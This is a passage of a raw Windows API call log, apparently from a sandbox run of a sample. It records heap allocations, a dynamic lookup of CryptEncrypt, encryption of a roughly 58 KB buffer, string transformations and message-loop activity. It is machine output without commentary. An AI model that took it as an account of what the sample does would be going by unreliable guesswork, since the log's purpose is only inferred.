hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0256.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa038, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0256.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.628] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0256.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.628] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xe5f1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xe5f8) returned 1 [0256.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.631] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.631] CharLowerBuffW (in: lpsz="byte[58872]", cchLength=0xb | out: lpsz="byte[58872]") returned 0xb [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.632] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.633] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.633] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.633] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.633] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.633] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0256.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.634] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e2c48*, pdwDataLen=0x8bef68*=0xe5f1, dwBufLen=0xe5f8 | out: pbData=0x24e2c48*, pdwDataLen=0x8bef68*=0xe5f8) returned 1 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0256.635] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0256.636] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0256.636] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0256.636] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0256.636] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.636] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.637] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.637] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.637] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.637] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.638] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.638] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.638] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0256.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0256.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0256.638] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 